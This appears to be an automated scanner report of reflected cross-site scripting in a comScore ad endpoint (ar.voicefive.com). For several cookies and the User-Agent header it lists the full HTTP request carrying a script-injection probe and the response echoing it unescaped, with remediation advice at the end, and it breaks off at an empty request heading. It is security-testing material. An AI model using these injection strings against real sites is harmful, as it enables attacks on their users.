if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... -1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=129211085999b81<script>alert(1)</script>d14639a4c05', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload dccd3<script>alert(1)</script>b5f1dbeef61 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372dccd3<script>alert(1)</script>b5f1dbeef61; BMX_3PC=1
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:37:07 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... 4:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372dccd3<script>alert(1)</script>b5f1dbeef61', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_708 ...[SNIP]...
The value of the ar_70821733 cookie is copied into the HTML document as plain text between tags. The payload f80cc<script>alert(1)</script>16705103bb7 was submitted in the ar_70821733 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&f80cc<script>alert(1)</script>16705103bb7; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:37:04 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&f80cc<script>alert(1)</script>16705103bb7', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&' }; COMSCORE.BMX.Buddy.ServerTimeEpoch="1292117824";COMSCORE.BMX.Buddy.start(({" ...[SNIP]...
The value of the ar_p43112268 cookie is copied into the HTML document as plain text between tags. The payload 65dca<script>alert(1)</script>c0fad0daf6c was submitted in the ar_p43112268 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&65dca<script>alert(1)</script>c0fad0daf6c; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:37:00 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... u Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&65dca<script>alert(1)</script>c0fad0daf6c' }; COMSCORE.BMX.Buddy.ServerTimeEpoch="1292117820";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p41327062",RecruitFrequency:0,Inv:"inv_300x250",Version:3}],"MasterSettings":{"GlobalCook ...[SNIP]...
The value of the ar_p70821733 cookie is copied into the HTML document as plain text between tags. The payload 149a8<script>alert(1)</script>2a00f6c589d was submitted in the ar_p70821733 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&149a8<script>alert(1)</script>2a00f6c589d; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:37:02 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... itExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&149a8<script>alert(1)</script>2a00f6c589d', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:4 ...[SNIP]...
The value of the ar_p72213098 cookie is copied into the HTML document as plain text between tags. The payload 9d941<script>alert(1)</script>3c598c502e0 was submitted in the ar_p72213098 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&9d941<script>alert(1)</script>3c598c502e0; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:37:03 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... n Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&9d941<script>alert(1)</script>3c598c502e0', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&' }; COMSCORE.BMX.Buddy.ServerTimeEpoch="1292117823";COMSCORE.BMX.Buddy.start(({" ...[SNIP]...
The value of the ar_p76230671 cookie is copied into the HTML document as plain text between tags. The payload 51b09<script>alert(1)</script>3a421974d11 was submitted in the ar_p76230671 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&51b09<script>alert(1)</script>3a421974d11; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:37:01 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... ad",C.OnReady.onload); }}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Buddy.cookies={ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&51b09<script>alert(1)</script>3a421974d11', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&pr ...[SNIP]...
The value of the ar_p76459327 cookie is copied into the HTML document as plain text between tags. The payload 77352<script>alert(1)</script>17d48bb5b3b was submitted in the ar_p76459327 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&77352<script>alert(1)</script>17d48bb5b3b; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:37:04 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... 5 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&77352<script>alert(1)</script>17d48bb5b3b' }; COMSCORE.BMX.Buddy.ServerTimeEpoch="1292117824";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p41327062",RecruitFrequency:0,Inv:"inv_300x250",Version:3}],"MasterSettings":{"GlobalCook ...[SNIP]...
The value of the ar_p76910469 cookie is copied into the HTML document as plain text between tags. The payload 96153<script>alert(1)</script>6d9153e48df was submitted in the ar_p76910469 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&96153<script>alert(1)</script>6d9153e48df; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:37:06 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&96153<script>alert(1)</script>6d9153e48df', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu000033 ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 268a9"-alert(1)-"3c9be397fb2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
